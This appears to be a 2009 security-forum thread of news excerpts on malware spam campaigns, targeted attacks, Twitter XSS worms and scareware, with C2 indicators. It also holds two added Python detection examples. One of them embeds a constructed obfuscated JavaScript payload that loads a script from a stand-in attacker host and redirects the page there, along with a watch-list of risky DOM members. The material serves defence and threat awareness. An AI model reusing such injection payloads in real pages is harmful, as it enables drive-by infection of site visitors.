02.12.2009 - "Websense... has spotted an emerging malicious spam lure, masquerading as a message from Skype. The spammed message uses Skype's logos and themes, posing as a Valentine promotion. With two days to go before Valentine's day, the fake promotion entices the user into sending a free Valentine video message to a loved one. The proposed video link in the message leads to a malicious compressed archive file named valentine.exe... Earlier today we noticed that the same group were sending out spoofed-Hallmark e-greetings and now they have recently switched to this spoofed-Skype video card campaign..."
(Screenshots of a spammed email available at the URL above.)
:fear::mad:
AplusWebMaster
2009-02-14, 15:24
FYI...
- http://blog.trendmicro.com/waledac-spreads-more-malware-love/
Feb. 13, 2009 - "... A recently reported case of malware-related SPAM contains a short Valentine’s message — and with an embedded URL that leads to malicious content... The malicious file is actually a WALEDAC variant detected... WALEDAC variants* have been previously served through e-card spam..."
(Screenshots available at the URL above.)
Search Results for 'WALEDAC' - MALWARE and GRAYWARE List
* http://preview.tinyurl.com/akubv6
...42 records match your query
Waledac Tracker Summary Data
- http://www.sudosecure.net/waledac/index.php
2009-02-14
:fear::mad:
AplusWebMaster
2009-02-18, 04:55
FYI...
Re-resurgence of .cn URL SPAM
- https://forums.symantec.com/t5/blogs/blogarticlepage/blog-id/spam/article-id/148
02-17-2009 - "As discussed in the Symantec State of Spam Report* for February, URLs with the “.cn” country code top level domain (ccTLD) have become a popular ingredient in spam messages. A top-level domain (TLD) is the part of a domain name that follows the final dot of any domain name. A ccTLD is a top-level domain generally reserved or used by a country or a dependent territory. According to the February report, URLs with .cn ccTLDs accounted for approximately 32% of all URLs seen during that period. However, we saw a noticeable decrease in this particular technique starting around the end of January with levels dropping down to 7%. On February 12, we once again observed a revival approaching similar levels as was seen in January—these levels are currently sitting around 29%. The URLs are applied to various kinds of spam attacks, but one of the more popular versions uses legitimate messages such as newsletters and replaces the existing URLs with .cn URLs to peddle spam products..."
* http://www.symantec.com/business/theme.jsp?themeid=state_of_spam
___
SPAM Attacks on Job Seekers
- https://forums.symantec.com/t5/blogs/blogarticlepage/blog-id/spam/article-id/147
02-17-2009 - "With the worsening economic situation, unemployment figures have risen worldwide. This has led millions of people to search for jobs, using whatever resources they can find. One of the most common is online job search sites. Email alerts from recruitment agencies are anxiously viewed for future job prospects and hopes dashed when rejection letters are received. Malicious code writers are making use of this opportunity to distribute their malware. Symantec has recently observed emails with malicious attachments, informing the recipient of a job rejection and including an attached copy of their purported application. These emails pose as though they have been sent from a genuine recruitment agency... The attached zip file “copy of your CV.zip” contains an executable file, detected as Hacktool.Spammer by Symantec Antivirus. Hacktool.Spammer is a program that hackers use to attack mail boxes by flooding them with email. It can be programmed to send many email messages to specific addresses. It will be difficult to ignore emails from job agencies, but we can definitely be cautious of file types, particularly executables (.exe). -Any- email with this type of application extension should be considered suspicious, particularly if it's coming from an unknown sender. We have also seen job offer attacks with an intention of harvesting email addresses. If the recipient clicks on any of the links found in the message, the spammer gets a confirmation that the email address is a live account. This account can then be targeted in a spam campaign at a later date. Clicking an "unsubscribe" link also yields the same results, because in the action of unsubscribing you are confirming the account is a live address..."
:mad: :fear: :buried:
AplusWebMaster
2009-02-23, 23:24
FYI...
eBay Auction Tool Web Site Infected With Malware
- http://preview.tinyurl.com/d6a9xm
Feb. 23, 2009 PC World - "A Trojan horse lurking on servers belonging to Auctiva.com, a Web site offering eBay auction tools, infected people's PCs last week. The problem became very public when Google's malware warning system kicked in as people tried to browse the site, saying Auctiva was infected with malware. Google will display an interstitial page warning people of certain Web sites known to contain malware. "It appears the reason these virus alert warnings started showing up on our site is because some of our machines were injected with malware originating in China," according to a post on Auctiva's community forum... It appears that the malware targeted Microsoft's Internet Explorer browser... "Found eight Trojans on my system that seemed to have snuck through my on-access protection, or maybe because, like a fool, I clicked 'ignore the warning' to get to Auctiva's front page," wrote one user on Auctiva's forum. If Google displays a warning about a dangerous Web site, it still gives people the option of browsing to the site. Auctiva said it was working with Google to ensure the warning is not displayed now that it has cleaned up its servers. However, people who browsed Auctiva between Thursday and Saturday afternoon until 2 p.m. Pacific time should ensure their machines are not infected..."
:fear::lip:
AplusWebMaster
2009-02-27, 14:48
FYI...
Rogue Facebook apps...
- http://blog.trendmicro.com/a-second-rogue-facebook-application-in-just-a-week/
Feb. 26, 2009 - "In a second attack, extremely reminiscent of the one that took place this weekend*, Facebook users have once again been victimized by cybercriminals. Reports started surfacing this afternoon of yet another rogue Facebook application posting notifications to user profiles... The link in the notification led on to an application named f a c e b o o k - - closing down!!! which, once installed, would proceed to spam all of the affected user’s friends with the same message. It may also harvest personal information along the way... Prevention of rogue applications with extremely dubious intent to propagate freely within the site is needed. Users are advised to exercise extreme caution when surfing..."
* http://blog.trendmicro.com/rogue-facebook-app-linked-to-blackhat-seo/
(Screenshots available at both URLs above.)
:fear:
AplusWebMaster
2009-03-02, 18:20
FYI...
- http://blog.trendmicro.com/new-variant-of-koobface-worm-spreading-on-facebook/
March 1, 2009 - "I just received a Facebook message from a friend; it was a pretty standard one that is beginning to look familiar to a lot of us I am sure. What surprised me though, was the page that the link led to. On the face of it is a very familiar looking spoofed version of YouTube, complete with bogus comments from “viewers”... Take a second look though, the link had taken me to a site supposedly hosting a video posted by the same person that I had received the Facebook message from. In fact not only was the malicious landing page displaying his name, it had also pulled the photo from his Facebook profile... Clicking the Install button redirects to a download site for the file setup.exe which is the new Koobface variant detected as WORM_KOOBFACE.AZ. It is hosted on an IP address in another part of the world, and in the last hour, we’ve seen 300+ different unique IP addresses hosting setup.exe and we’re expecting more. All seen IP addresses hosting the said malicious file are now detected as HTML_KOOBFACE.BA. Analysis by our engineers reveals that WORM_KOOBFACE.AZ propagates through other social networking sites as well..."
(Screenshots available at the URL above.)
- http://www.us-cert.gov/current/index.html#malicious_code_targeting_social_networking
March 4, 2009 - "...malicious code spreading via popular social networking sites including myspace.com, facebook.com, hi5.com, friendster.com, myyearbook.com, bebo.com, and livejournal.com. The reports indicate that the malware, named Koobface, is spreading through invitations from a user's contact that include a link to view a video. If the users click on the link in this invitation, they are prompted to update Adobe Flash Player. This update is not a legitimate Adobe Flash Player update, it is malicious code..."
:fear::mad:
AplusWebMaster
2009-03-04, 13:29
FYI...
- http://www.f-secure.com/weblog/archives/00001619.html
March 4, 2009 - "Online criminals regularly post their ads on YouTube, looking for buyers for their products. Some recent examples... (Screenshots at the URL above.) No big surprises there. A bit more surprisingly, when you want to report such videos to YouTube admins, they actually don't have an option for reporting criminal use..."
- http://www.internetnews.com/security/print.php/3808326
March 3, 2009 - "... In both the Digg and YouTube attacks, links claim to take visitors to a video. Instead, they redirect them to one of several sites that then download malware like the Adware/Videoplay worm. The worm steals cookies, passwords, user profiles and e-mail account information and sends these to a remote site over the Internet. It can also make copies of itself in removable media to spread further. The links can also direct users to download fake antivirus software..."
- http://pandalabs.pandasecurity.com/archive/Metatags-in-malware-websites.aspx
:fear::mad::fear:
AplusWebMaster
2009-03-05, 17:58
FYI...
Fake job ads up 345%...
- http://www.informationweek.com/shared/printableArticle.jhtml?articleID=215800622
March 5, 2009 - "Job seekers beware. Identity thieves are looking to steal personal information from those searching for employment. Fake job ads are up 345% over the past three years, according to the U.K. Association for Payment Clearing Services, and the Identity Theft Resource Center (ITRC)* warns that would-be workers should be careful about providing personal information to purported employers..."
* http://preview.tinyurl.com/2j6y3b
:fear::mad:
AplusWebMaster
2009-03-06, 14:12
FYI...
Scams - Economic Stimulus email and websites...
- http://www.us-cert.gov/current/#economic_stimulus_email_and_website
March 5, 2009 - "... economic stimulus scams circulating. These scams are being conducted through both email and malicious websites. Some of the email scam messages request personal information, which can then be used for identity theft. Other email scam messages offer to deposit the stimulus funds directly into users' bank accounts. If users provide their banking information, the attackers may be able to withdraw funds from the users' accounts. The website scams entice users by claiming that they can help them get money from the stimulus fund. These websites typically request payment for their services. If users provide their credit card information, the attackers running the malicious sites may make unauthorized charges to the card, or charge users more than the agreed upon terms..."
- http://ftc.gov/opa/2009/03/stimulusscam.shtm
:fear::spider::fear:
AplusWebMaster
2009-03-09, 19:31
FYI...
Fake Windows Support SPAM... Info-Stealer
- http://blog.trendmicro.com/fake-windows-support-spam-brings-forth-an-info-stealer/
Mar 9, 2009 - "... Spammed email messages were found pretending to come from Microsoft Windows Support and claiming that Microsoft Service Pack 1 and Service Pack 2 have been discovered to have an error that can damage the computer’s software or even the hardware. These messages encourage users to download and install a file in order to fix the problem. When users click the download button they are redirected to a site and are asked to download a file which Trend Micro detects as TROJ_DLOADER.CUT... TROJ_DLOADER.CUT connects to a certain URL to download another malicious file, which in turn is detected by Trend Micro as TSPY_BANKER.MCL. TSPY_BANKER.MCL monitors the affected user’s online transactions and steals banking related information. Not too many TSPY_BANKER variants have been reported to be related to notable attacks recently, and this incident may pretty much mark the end of the hiatus. Users are advised to ignore spammed messages and, more importantly, to never click links embedded in these messages..."
(Screenshot available at the URL above.)
:fear::mad:
AplusWebMaster
2009-03-10, 16:13
FYI...
- http://preview.tinyurl.com/dn8vkj
March 9, 2009 PandaLabs blog - "Today we're announcing results of a study that analyzed 67 million computers in 2008 and revealed that 1.1 percent of the worldwide population of Internet users have been actively exposed to identity theft malware. We predict that the infection rate will increase by an additional 336 percent per month throughout 2009, based on the trend of the previous 14 months. Here are the highlights from our study on the evolution of online identity theft:
• Over three million of the audited users in the U.S. and more than 10 million users worldwide were infected with active identity theft-based malware last year.
• 1.07% of all PCs scanned in 2008 were infected with active malware (resident in memory during the scan) related to identity theft, such as banker Trojans.
• 35% of the infected PCs had up-to-date antivirus software installed.
• The number of PCs infected with identity theft malware increased by 800 percent from the first half of 2008 to the second half.
• Arizona, California and Florida continue to be the states with the highest per-capita incidence of reported identity theft.
Active malware means malware that is loaded into the PC's memory and actively running as a process. For example, users of PCs infected with this type of identity theft malware who utilize online services such as shopping, banking, and social networking, have had their identities stolen in some fashion. According to the Federal Trade Commission (FTC), the average time victims spend resolving identity theft issues is 30 hours per incident. The cumulative cost in hours alone from identity theft related malware based on Panda Security's projected infection rate could reach 90 million hours..."
:fear::mad:
AplusWebMaster
2009-03-13, 16:02
FYI...
- http://blog.trendmicro.com/tinyurl-phishing-becoming-popular/
Mar. 13, 2009 - "... We previously blogged about similar phishing operations that used this exact technique to trick users into thinking links are legitimate:
• http://blog.trendmicro.com/not-so-tiny-phishing/
• http://blog.trendmicro.com/tinyurl-now-used-in-im-phishing/
...Substituting preview.tinyurl.com* for tinyurl.com also allows users to get a preview of the final link."
* http://tinyurl.com/preview.php
"Don't want to be instantly redirected to a TinyURL and instead want to see where it's going before going to the site? Not a problem with our preview feature..."
:bigthumb:
AplusWebMaster
2009-03-13, 22:43
FYI...
Malicious spam run(s), again...
- http://www.f-secure.com/weblog/archives/00001625.html
March 13, 2009 - "The type of spam runs we saw late last year (Obama and BofA) are starting to pick up again in volume. We've seen Classmates being used as a theme and two days ago it was fake Facebook messages. Today it's back to fake Bank of America certificates... As in all previous spam runs it leads to a site prompting you to download a fake Adobe Flash player. This malware steals confidential information and sends it to a web server. In previous attacks this server was in Ukraine but it has now been moved to Hong Kong. If you see network traffic to the IP address 58.65.232.17 it's a bad sign."
(Screenshot available at the URL above.)
:fear:
AplusWebMaster
2009-03-16, 16:24
FYI...
- http://securitylabs.websense.com/content/Alerts/3321.aspx
03.16.2009 - "Websense... has detected yet another new Waledac campaign theme in the wild. The new variant uses a Reuters theme as a social engineering mechanism to report a bogus news item relating to a 'bomb explosion'. The malicious Web sites in the current attack are socially engineered to report the geolocation of the incident corresponding to the user's IP address. They encourage users to view a video supposedly related to the news report. When users click on the video or the link below the video, they are advised to download the latest version of Flash Player. This leads to the download of Waledac variants. The theme includes legitimate links corresponding to Wikipedia and Google which are presented in a 'Related Links' section of the attack Web sites. Those legitimate links are used to target unsuspecting users in order to increase chances of success with the attack..."
- http://blog.trendmicro.com/waledac-localizes-social-engineering/
Mar. 16, 2009
- http://www.sophos.com/security/blog/2009/03/3541.html
15 March 2009
(Screenshots available at each URL above.)
:fear::mad:
AplusWebMaster
2009-03-18, 22:26
FYI...
- http://blog.trendmicro.com/online-risks-thrive-despite-a-down-economy/
Mar. 17, 2009 - "...TrendLabs reports more than a twenty-fold (2000 percent) increase in web threats between the beginning of 2005 and the end of 2008... for 2008 over 90 percent of all digital threats arrive at their targets via the Internet... from January until November 2008, a staggering 34.3 million PCs were infected with botnet-related malware..."
Trend Micro 2008 Annual Threat Roundup and 2009 Forecast
- http://us.trendmicro.com/imperia/md/content/us/pdf/threats/securitylibrary/trend_micro_2009_annual_threat_roundup.pdf
3.26MB PDF file
:fear::blink::fear:
AplusWebMaster
2009-03-20, 12:32
FYI...
SPAM - fake Comcast, Facebook e-mails
- http://www.f-secure.com/weblog/archives/00001630.html
March 19, 2009 - "...new SPAM run that's going on. It's from the same group that used Bank Of America as the lure late last week and Northern Bank on Monday. Today it's Comcast and it might actually have a higher success rate than the previous run as users always want faster broadband, especially if there's no fee involved. And the page looks really convincing. Once installed the malware does the same as in the other spam runs - steals data and sends it to Hong Kong...
Update: The spam run was just changed to a Facebook scheme.
Some subjects are:
• FaceBook message: Magnificent girl dancing video clip (Last rated by Sal Velasquez)
• FaceBook message: Dancing Girl Drunk In The Pub- facebook Video (Last rated by Abe Bain)
• FaceBook message: Hot Girl Dancing At Striptease Dance Party (Last rated by Lowell Clay)
• FaceBook message: Dancing Girl Drunk In The Pub- facebook Video (Last rated by Shane Lucas)..."
YouTube e-mail link...
- http://www.f-secure.com/weblog/archives/00001629.html
March 19, 2009 - "YouTube is once again being used as a lure to spread malware. Some clown is sending out e-mails... if you follow the link, this one actually uses a Java applet (complete with a fake signature) to push a variant of Parite to the machines..."
Death exploited by hackers...
- http://www.sophos.com/blogs/gc/g/2009/03/19/natasha-richardsons-death-exploited
March 19, 2009 - "Cybercriminals don't waste any time these days jumping on the coat-tails of breaking news stories in their attempt to infect as many computer users as possible. This time it's the tragic death of award-winning English actress Natasha Richardson, who died yesterday after suffering head injuries in a skiing accident earlier in the week. It appears that hackers are stuffing webpages with keywords - most likely scraping the content off legitimate news websites - in order to lure unwary surfers into visiting their dangerous sites and infecting their computers... of course, if you do visit the malicious web link a malicious script will run on your computer... that then runs a fake anti-virus product designed to scare you into making an unwise purchase. Fake anti-virus products, also known as scareware or rogueware, are one of the fastest growing threats on the internet, and attempt to frighten you into believing that your computer has a security problem and that you should purchase a solution from the very people who have tricked you..."
(Screenshots available at each URL above.)
:fear::buried:
AplusWebMaster
2009-03-30, 03:38
FYI...
Ghostnet - targeted attacks
- http://www.f-secure.com/weblog/archives/00001637.html
March 29, 2009 - "University of Toronto published today a great research paper on targeted attacks. We've talked about targeted attacks for years. These cases usually go like this:
1. You receive a spoofed email with an attachment
2. The email appears to come from someone you know
3. The contents make sense and talk about real things (and in your language)
4. The attachment is a PDF, DOC, PPT or XLS
5. When you open up the attachment, you get a document on your screen that makes sense
6. But you also get exploited at the same time
7. The exploit drops a hidden remote access trojan, typically Grey Pigeon or Gh0st Rat variant
8. No one else got the email but you
9. You work for a government, a defense contractor or an NGO ...
But the real news is that Greg Walton & co actually managed to get an inside view of some of the servers used in these spying attacks. This means they got to see what was being done with the infected machines and where in the world they were... The release of the paper was synchronized with the New York Times article*. University of Cambridge released a related research paper at the same time as well. The Cambridge paper goes all the way to point the finger directly at the Chinese Government. Most other parties, us included, have not made such direct accusations without concrete proof of government involvement... here are selected blog posts on the topic:
• Several examples of what the attack documents looked like
- http://www.f-secure.com/weblog/archives/00001406.html
• The mystery of Sergeant "nbsstt"
- http://www.f-secure.com/weblog/archives/00001449.html
• How we found the PDF generator used in some of these attacks
- http://www.f-secure.com/weblog/archives/00001450.html ..."
* http://www.nytimes.com/2009/03/29/technology/29spy.html
(Original document - scribd.com )
- http://preview.tinyurl.com/d5q3cj
Mar. 28, 2009 - "This report documents the GhostNet - a suspected cyber espionage network of over 1,295 infected computers in 103 countries, 30% of which are high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs..."
:fear::fear:
AplusWebMaster
2009-04-02, 22:33
FYI...
- http://www.marshal.com/TRACE/traceitem.asp?article=920&thesection=trace
April 1, 2009
"...Spam
... by the end of March 2009 the SVI (Spam Volume Index) had reached its pre-McColo level. Even so, taking a longer term view, spam volume still remains less than mid-2008. We believe successive events, including the interruption of the Atrivo/Intercage network in September, the FTC crackdown of the ‘Affking’ gang in October, the McColo shutdown in November and the subsequent demise of the Srizbi botnet, and disruption to the Bobax botnet in late 2008, have all contributed to make life more difficult for spammers...
Botnets
... a handful of botnets continue to dominate the distribution of spam. At the end of March 2009, the familiar botnets Mega-D and Rustock and Pushdo continued to dominate spam production. Xarvester is the new kid on the block, and shares quite a few similarities to its likely predecessor, Srizbi. Add a second tier of botnets, namely Donbot, Grum and Gheg, and collectively, this motley group accounts for over 70% of spam...
Malicious Spam Campaigns
... The Waledac botnet, the probable successor to Storm, has been active with a range of campaigns including President Obama, Valentines, fake coupons and bomb blast news stories. The Pushdo botnet, too, continues to pump out various malicious spam and phishing email, including fake facebook.com and classmates.com campaigns...
Malicious Web Campaigns... (Rogue AV, etc.)
The last few months have seen the resurgence of the fake anti-virus purveyors, which have been part of the scene in one form or another for the best part of 12 months. Most recently, search engine optimization, using hot Google search terms*, is being used to drive users to websites where they are prompted to download, install, and pay for this dubious ‘anti-virus’ software...."
* http://www.marshal.com/trace/traceitem.asp?article=884
:fear:
AplusWebMaster
2009-04-08, 05:21
FYI...
- http://www.f-secure.com/weblog/archives/00001649.html
April 7, 2009 @ 11:10 GMT - "We see targeted attacks and espionage with trojans regularly. Here's a typical case. A malicious Excel XLS file (md5: 3c740451ef1ea89e9f943e3760b37d3b) was emailed to a target - apparently to just one person... The exploit code creates two new DLL files in the SYSTEM32 folder ("apimgr.dll" and "netserv.dll") and executes them. These DLL files are backdoors that try to communicate back to the attackers, using these sites:
• feng.pc-officer .com
• ihe1979.3322 .org
Right now, host ihe1979.3322 .org does not resolve at all, and feng.pc-officer .com resolves to a placeholder IP (which is 63.64.63.64). The attackers can temporarily make the hostname resolve to the real IP address and then turn it back, to hide their tracks. The domain name pc-officer .com is a weird one. It was already registered in 2006, and it has been used in targeted attacks before. See this ISC blog entry from September 2007*. Here the attack was done via a DOC file, instead of XLS. And the reporting server was ding.pc-officer .com, not feng.pc-officer .com. If you haven't read about Ghostnet** yet, now would be a good time..."
* http://isc.sans.org/diary.html?storyid=3400
** http://en.wikipedia.org/wiki/GhostNet
(Screenshot available at the F-secure URL above.)
Update: "... IP 63.64.63.64 is just a placeholder; 216.255.196.154 is the real control server. They only bring it online sporadically, trying to avoid detection.
The IP is located in Spokane, USA:
% whois 216.255.196.154
OrgName: One Eighty Networks
OrgID: OEN-1
Address: 118 N Stevens
City: Spokane
StateProv: WA
PostalCode: 99201
Country: US ..."
:fear::fear:
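The "placeholder IP most of the time, real C2 only sporadically" trick above is easy to miss if you only resolve a hostname once. Added example (not from the F-Secure post or this thread), in Python: it takes a series of resolver observations for the hostnames named in the post and reports every window in which a watched name left its placeholder and pointed at a real address. The observation list, timestamps and the 192.0.2.x address are constructed for the example; the 63.64.63.64 placeholder, 216.255.196.154 control server and hostnames are the ones quoted above.

```python
from collections import defaultdict
from datetime import datetime
from ipaddress import ip_address

# Indicators quoted in the F-Secure post above.
PLACEHOLDER_IPS = {"63.64.63.64"}                # parked "placeholder" answer
KNOWN_C2_IPS = {"216.255.196.154"}               # the real control server
WATCHED_HOSTS = {"feng.pc-officer.com", "ihe1979.3322.org", "ding.pc-officer.com"}

# Constructed passive-DNS style observations: (timestamp, hostname, answer).
# "NXDOMAIN" marks a name that did not resolve; the timestamps and the
# 192.0.2.x address are invented for this example.
SAMPLE_OBSERVATIONS = [
    ("2009-04-06T08:00:00", "feng.pc-officer.com", "63.64.63.64"),
    ("2009-04-06T12:00:00", "feng.pc-officer.com", "63.64.63.64"),
    ("2009-04-06T13:07:00", "feng.pc-officer.com", "216.255.196.154"),
    ("2009-04-06T13:40:00", "feng.pc-officer.com", "63.64.63.64"),
    ("2009-04-06T08:00:00", "ihe1979.3322.org", "NXDOMAIN"),
    ("2009-04-06T09:00:00", "www.example.com", "192.0.2.10"),
]


def classify(answer):
    """Label one DNS answer: placeholder, known_c2, unresolved, or address."""
    if answer in PLACEHOLDER_IPS:
        return "placeholder"
    if answer in KNOWN_C2_IPS:
        return "known_c2"
    try:
        ip_address(answer)
    except ValueError:
        return "unresolved"
    return "address"


def group_by_host(rows):
    """Group answers per hostname, oldest first."""
    by_host = defaultdict(list)
    for ts, host, answer in rows:
        by_host[host.lower()].append((datetime.fromisoformat(ts), answer))
    for answers in by_host.values():
        answers.sort()
    return by_host


def find_live_windows(rows, watched=WATCHED_HOSTS):
    """Return (host, start, end, ip) for every interval in which a watched
    hostname pointed at a real address; end is None if it is still live."""
    windows = []
    for host, answers in group_by_host(rows).items():
        if host not in watched:
            continue
        live = None                                # (start_ts, ip) while live
        for ts, answer in answers:
            kind = classify(answer)
            if kind in ("known_c2", "address") and live is None:
                live = (ts, answer)
            elif kind in ("placeholder", "unresolved") and live is not None:
                windows.append((host, live[0], ts, live[1]))
                live = None
        if live is not None:
            windows.append((host, live[0], None, live[1]))
    return windows


if __name__ == "__main__":
    for host, start, end, ip in find_live_windows(SAMPLE_OBSERVATIONS):
        print(f"{host} -> {ip} from {start} until {end or 'now'}")
```

Feed it whatever periodic resolution log you keep (a cron'd dig, passive DNS, proxy logs with resolved IPs); the point is that the window boundaries, not the current answer, are what tell you when the backdoors could actually have talked to the attackers.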
AplusWebMaster
2009-04-08, 14:15
FYI...
- http://securitylabs.websense.com/content/Alerts/3337.aspx
04.08.2009 - "... new SPAM campaign aimed at Match.com is being used to spread a trojan called Papras over the Internet. Match.com is an online dating service. The service reportedly has more than 15 million members and has Web sites serving 37 countries in more than 12 different languages. On April 7 2009, we received thousands of malicious emails in our email Honey Pot system. The email claims that someone wants to show the user her pictures and videos, and lures the user into visiting the Web site set up by the attacker. When the user starts the video on the Web site, they are asked to install a streaming video player which is actually a trojan with relatively low AV detection*...
(Screenshots available at the Websense URL above.)
* http://www.virustotal.com/analisis/aed50eb83aa34072d761e33959e61e1d
File ADOBE_PlayerInstallation.exe
:fear::fear:
AplusWebMaster
2009-04-08, 15:29
FYI...
IRS SPAM fakes and phish...
- http://blog.trendmicro.com/tax-season-is-phishing-season/
Apr. 7, 2009 - "As usual, the approaching tax season (April 15th is Tax Day in the US) also comes with tax-related online threats. With unemployment rates reaching record highs this year, cybercriminals have yet another opportunity to polish their social engineering techniques. Last year, spammed messages supposedly from the Internal Revenue Service (IRS) delivered malware into systems. The email messages were sternly-worded. The intention was to alarm recipients of what these same messages claimed were incomplete tax forms, which could lead to tax avoidance fraud. High-profile institutions, including Fortune 500 companies and US Defense contractors, were prominent targets of this attack. This year, cybercriminals offer their recipients ways to save money by supposedly reducing their expenses on tax preparation transactions. The recent email samples no longer purport to come from the IRS, though. They do, however, offer tax relief services for tax help-seekers. And instead of downloading malware, unknowing users are tricked into giving out personal and sensitive information to phishers... The threat does not end there. After completing the steps... for users to supposedly have tax relief, other windows load... These are supposedly credit-related sites, but like the tax relief page they also steal sensitive and confidential user information. The spammers/phishers behind this threat have thus fashioned the attack to be both timely and seemingly relevant by exploiting the tax season as well as recession-related concerns. The IRS recently set up an information page* in response to this threat..."
* http://www.irs.gov/privacy/article/0,,id=179820,00.html
(Screenshots available at the TrendMicro URL above.)
- http://isc.sans.org/diary.html?storyid=6145
Last Updated: 2009-04-07 19:50:37 UTC - "... a few things to watch out for:
• fake e-file websites. Only use reputable companies. I did a quick check earlier and didn't see any obvious fakes on Google, but this may change at any time.
• IRS e-mails: The IRS will -never- send you an e-mail asking you to go to a website to get a refund.
• malicious tax preparation software: Don't just download the next best free tax prep software package.
• and once you are all done: Make good offline backups. If you used tax preparation software, burn a couple CDs with your files and don't forget to retain a copy of the software itself so you can read the files later. Keep a paper copy. This includes supporting electronic files like account software and spread sheets that you may use to track finances..."
:fear::fear:
AplusWebMaster
2009-04-10, 22:56
FYI...
- http://www.sophos.com/blogs/sophoslabs/v/post/3962
April 10, 2009 - "Messages posing as legitimate greeting cards with titles such as “You’ve received A Hallmark E-Card! !” have been prevalent on the Internet... Over the past months, the malicious emails have become slightly more subtle in their delivery method. While they previously included a telltale zip file as an attachment or a link to an exe, the current crop of messages masquerade as legitimate notifications with no attachments, but the links embedded in the mail point to a web page on some third party web site - which is designed to load malware... avoid opening e-cards that aren’t addressed to you, and aren’t from someone you know. The majority of the spammed e-cards do not indicate the sender or the recipient in the body, and so are easy to recognize. Legitimate e-cards tend to have this personally identifiable information included in the message body..."
(Screenshot available at the URL above.)
:fear::mad:
AplusWebMaster
2009-04-12, 20:16
FYI...
Easter worm in Twitter...
- http://www.f-secure.com/weblog/archives/00001653.html
April 12, 2009 - "A cross-site scripting worm was spreading in Twitter profiles for several hours last night. People started reporting that their profile had sent Twitter messages without their knowledge... Later on the messages morphed several times... Many people followed the links to stalkdaily .com, as they believe the messages to be genuine Tweets from their friends. A cross-site script on the site then caused new users to start to Tweet the same messages... As expected, the whole worm was a publicity stunt by stalkdaily .com... You can see the latest official status of Twitter from their status page at http://status.twitter.com/ . Updated to add: This is -not- over. There's going to be quite a few modified Twitter worms for a day or two. Be careful in Twitter, don't view profiles, don't follow links... All these attacks are Javascript-based. Turn Javascript off if you're worried..."
(Screenshots available at the F-secure URL above.)
- http://status.twitter.com/post/95693986/update-on-worm
Apr 13, 2009 - "Update on worm... We are currently addressing a new manifestation of the worm attack..."
:fear:
AplusWebMaster
2009-04-13, 22:28
FYI...
- http://isc.sans.org/diary.html?storyid=6187
Last Updated: 2009-04-13 18:07:20 UTC - "... copycat Twitter XSS worms exploit the same vulnerability – actually most of the code remains the same but they obfuscated it to make analysis a bit harder. They also added a couple of updates so it looks like they are exploiting other profile setting fields which the original worm didn't exploit, such as the profile link color. One thing about this copycat worm I found interesting is the type of obfuscation they used. The attackers used the [ and ] operators in JavaScript in order to reference methods in objects... It looks like the folks from Twitter are still fixing all the vulnerabilities... Use addons such as Noscript* for Mozilla ..."
* http://noscript.net/getit
- http://www.f-secure.com/weblog/archives/00001654.html
April 13, 2009
Twitter Worm Mikeyy Keywords Hijacked to Serve Scareware
- http://ddanchev.blogspot.com/2009/04/twitter-worm-mikeyy-keywords-hijacked.html
April 15, 2009
:fear:
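The bracket trick the ISC diary mentions (obj["wri"+"te"] instead of obj.write) defeats any signature that looks for the dotted name. Added example (not from the ISC diary or this thread), in Python: a small normaliser that folds string-literal bracket lookups back into dot notation so the member names can be matched again. The payload it runs on is constructed in the style described above, not the real worm code, and the attacker.invalid URLs are invented.

```python
import re

# obj["na"+"me"]: one or more string literals joined by "+" inside square
# brackets, immediately after an identifier character, ")" or "]" (so array
# literals such as ["a"] are left alone).
_BRACKET_LITERAL = re.compile(
    r"""(?<=[\w$)\]])\[\s*((?:(?:"[^"\\]*"|'[^'\\]*')\s*(?:\+\s*)?)+)\]""")
_STRING = re.compile(r""""([^"\\]*)"|'([^'\\]*)'""")
_IDENT = re.compile(r"[A-Za-z_$][\w$]*")

# Member names a profile-injected worm typically has to reach.
SUSPICIOUS_MEMBERS = ("eval", "document", "write", "cookie", "XMLHttpRequest",
                      "setTimeout", "fromCharCode", "location", "href")

# Constructed payload in the style described above (not the real worm code):
# every DOM access goes through split-string bracket lookups.
SAMPLE_PAYLOAD = (
    'var w=window,d=w["doc"+"ument"];'
    "d['wri'+'te'](\"<scr\"+\"ipt src='http://attacker.invalid/x.js'></scr\"+\"ipt>\");"
    'w["setTime"+"out"](function(){w["loc"+"ation"]["h"+"ref"]="http://attacker.invalid/"},5000);'
)


def normalize_bracket_access(js):
    """Rewrite obj["na"+"me"] as obj.name when the joined string is a valid
    identifier; otherwise emit a single canonical obj["na-me"]."""
    def repl(match):
        name = "".join(dq or sq for dq, sq in _STRING.findall(match.group(1)))
        if _IDENT.fullmatch(name):
            return "." + name
        return '["' + name + '"]'
    return _BRACKET_LITERAL.sub(repl, js)


def find_suspicious_members(js):
    """Names from SUSPICIOUS_MEMBERS that appear as .name after
    normalisation, sorted for stable output."""
    normalized = normalize_bracket_access(js)
    found = set(re.findall(r"\.([A-Za-z_$][\w$]*)", normalized))
    return sorted(m for m in SUSPICIOUS_MEMBERS if m in found)


if __name__ == "__main__":
    print(normalize_bracket_access(SAMPLE_PAYLOAD))
    print(find_suspicious_members(SAMPLE_PAYLOAD))
```

Run against the raw payload, the dotted-name search finds nothing useful (only the ".js" and ".invalid" inside string literals); after normalisation, document/write/setTimeout/location/href all surface. It is a regex pass, not a parser, so computed keys like obj[x] and String.fromCharCode sequences are left for the next layer.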
AplusWebMaster
2009-04-18, 03:30
FYI...
Yet another Twitter worm
- http://www.f-secure.com/weblog/archives/00001661.html
April 17, 2009 - "A new Twitter cross-site scripting worm is going around on Twitter. Just like the previous Twitter worms it talks about Mikeey... The malicious script itself is downloaded from 74.200.253.195*. Twitter is working on fixing the problem... Updated to add: Michael Mooney (Mikeey) confesses to writing this latest worm as well."
* http://centralops.net/co/DomainDossier.aspx
Queried whois.arin.net with "74.200.253.195"...
OrgName: FastServers, Inc.
OrgID: FASTS-1
Address: 175 W. Jackson Blvd
Address: Suite 1770
City: Chicago
StateProv: IL
PostalCode: 60604
Country: US ...
:fear::mad:
AplusWebMaster
2009-04-21, 14:41
FYI...
Zango: The End
- http://www.vitalsecurity.org/2009/04/zango-end.html
April 21, 2009 - "Zango Inc., the adware distributor fined $3 million by the Federal Trade Commission in 2006 for sneaking software onto people's PCs, has closed its doors after being acquired by video search engine company Blinkx PLC..."
- http://www.theregister.co.uk/2009/04/21/zango/
21 April 2009 - "... The end-game for Zango marks the end of the controversial adware business model. Other well known names in the field - including Claria (Gator), WhenU and DirectRevenue - ceased operations some time ago, leaving Zango as the last man standing."
